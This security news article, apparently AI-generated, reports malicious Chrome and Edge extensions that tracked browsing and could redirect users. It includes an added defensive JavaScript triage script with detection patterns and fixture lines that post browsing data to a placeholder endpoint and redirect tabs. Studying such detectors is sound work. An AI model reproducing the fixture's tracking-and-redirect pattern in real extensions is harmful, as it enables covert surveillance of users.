Ethical Hacking News
Malicious Chrome extensions with 1.7 million installs have been found on Google's Chrome Web Store, putting users at risk of having their browsing activity tracked and potentially taken to unsafe destinations. Users are advised to remove the extensions immediately and take precautions to protect themselves from potential cyber threats.
- Malicious Chrome extension downloaded over 1.7 million times, tracking users' browsing activity.
- Malicious extensions had hundreds of positive reviews and were featured prominently in the Chrome Web Store.
- Risk of being redirected to unsafe destinations, enabling cyberattacks.
- Auto-update system silently deploys new versions without user approval or interaction.
- Similar malicious extension found in Microsoft Edge store, infecting over 600,000 users.
- 18 extensions infected over 2.3 million users across both browsers.
- Users advised to remove listed extensions, clear browsing data, and monitor for suspicious activity.
Google's Chrome Web Store has recently been rocked by malicious extensions that have been downloaded over 1.7 million times, putting users at risk of having their browsing activity tracked and potentially taken to unsafe destinations. The extensions in question are verified, have hundreds of positive reviews, and are featured prominently on the Chrome Web Store, misleading users about their safety.
Researchers at Koi Security, a company providing a platform for securing self-provisioned software, discovered these malicious extensions in the Chrome Web Store and reported them to Google. They found that many of these extensions were still available after being flagged by the company, despite not having any malicious activity confirmed.
The malicious functionality is implemented in the background service worker of each extension using the Chrome Extensions API, registering a listener that is triggered every time a user navigates to a new webpage. This listener captures the URL of the visited page and exfiltrates the information to a remote server along with a unique tracking ID for each user.
The server can respond with redirection URLs, hijacking the user’s browsing activity and potentially taking them to unsafe destinations that may enable cyberattacks. Although the possibility is there, Koi Security has not observed malicious redirections in their testing.
Furthermore, the malicious code was not present in the initial versions of the extensions, but was introduced at a later time via updates. Google's auto-update system silently deploys the newest versions to users without requiring any user approval or interaction.
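For defenders reviewing unpacked extension versions, the following added example (not code from Koi Security or from the extensions themselves) flags the combination described above, a navigation listener plus an outbound request plus a tab redirect in the background service worker, and reports which of those capabilities first appeared in an update. The specific API names and the two fixtures are assumptions constructed for illustration; the article does not name the APIs the extensions used.

```javascript
// Added example (constructed data). The API names are real Chrome Extensions
// APIs picked as assumptions; the article does not name the ones actually used.
const INDICATORS = {
  navigationListener:
    /chrome\.(tabs\.onUpdated|webNavigation\.on(BeforeNavigate|Committed|Completed))\.addListener/,
  outboundRequest: /\bfetch\s*\(|new\s+WebSocket\s*\(/,
  tabRedirect: /chrome\.tabs\.update\s*\(/,
};
const ALL_SITES = /^(<all_urls>|(\*|https?):\/\/\*\/\*)$/;

// Static triage of one unpacked version: manifest object + service worker source.
function triage(manifest, workerSource) {
  const findings = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(workerSource));
  const grants = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  if (grants.some((g) => ALL_SITES.test(g))) findings.push("allSitesAccess");
  // Tracking needs both halves: see each navigation AND talk to a server.
  const tracksBrowsing =
    findings.includes("navigationListener") && findings.includes("outboundRequest");
  return {
    findings: findings.sort(),
    tracksBrowsing,
    canRedirect: tracksBrowsing && findings.includes("tabRedirect"),
  };
}

// Capabilities present in the new version but absent from the old one.
function introducedByUpdate(oldVer, newVer) {
  const before = triage(oldVer.manifest, oldVer.worker).findings;
  return triage(newVer.manifest, newVer.worker).findings.filter((f) => !before.includes(f));
}

// Constructed fixtures: a clean early release and a later update (abbreviated).
const v1 = {
  manifest: { manifest_version: 3, permissions: ["storage"] },
  worker: "chrome.runtime.onInstalled.addListener(() => {});",
};
const v2 = {
  manifest: { manifest_version: 3, permissions: ["storage", "tabs"], host_permissions: ["<all_urls>"] },
  worker: [
    "chrome.tabs.onUpdated.addListener(onNavigate);",
    "fetch(REMOTE_ENDPOINT, { method: 'POST', body: report });",
    "chrome.tabs.update(tabId, { url: reply.url });",
  ].join("\n"),
};

console.log(triage(v2.manifest, v2.worker));
console.log("new in update:", introducedByUpdate(v1, v2));
```

These are pattern matches on source text, so a hit is a reason to read the code, not proof of abuse, and minified or obfuscated workers will need unpacking first.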
Given that some of these extensions were safe for years, it is possible that they were hijacked/compromised by external actors who introduced the malicious code. Researchers discovered that cybercriminals have also planted malicious extensions in the official store for Microsoft Edge, which shows a total count of 600,000 downloads.
Combined, these eighteen extensions have infected over 2.3 million users across both browsers, creating one of the largest browser hijacking operations we’ve documented, according to Koi Security. They recommend users remove all listed extensions immediately, clear the browsing data to purge any tracking identifiers, check the system for malware, and monitor accounts for suspicious activity.
This incident highlights the importance of vigilance when it comes to browser extensions and the need for users to regularly inspect their installed add-ons for any signs of malicious activity. It also underscores the need for security software companies to implement robust detection mechanisms for such threats.
In conclusion, this discovery serves as a reminder that even seemingly legitimate browser extensions can be used for nefarious purposes. Users must remain cautious and vigilant when using these tools and always verify their safety before installing them on their systems.
Related Information:
https://www.ethicalhackingnews.com/articles/Malicious-Chrome-Extensions-with-17-Million-Installs-A-Growing-Threat-to-User-Security-ehn.shtml
https://www.bleepingcomputer.com/news/security/malicious-chrome-extensions-with-17m-installs-found-on-web-store/
Published: Tue Jul 8 09:44:48 2025 by llama3.2 3B Q4_K_M